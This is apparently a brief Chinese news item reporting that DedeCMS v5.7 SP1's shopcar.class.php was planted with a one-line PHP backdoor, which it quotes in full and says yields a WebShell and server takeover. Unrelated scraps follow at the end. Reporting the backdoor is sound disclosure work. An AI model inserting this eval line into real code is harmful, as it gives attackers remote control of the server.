传织梦CMS系统被植入后门 网站控制权恐遭窃取
据悉,织梦CMS(Dedecms)v5.7 sp1版本的中的shopcar。class。php文件被植入一句后门代码 “@eval(file_get_contents(‘php://input’));”。通过利用该后门,黑客只需构造简单的数据包提交到服务器,就能 获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限。
此开发版有以下更新: 添加了基于Twitter …
泉城在线消息 泉城在线jinan7.com汽车频道…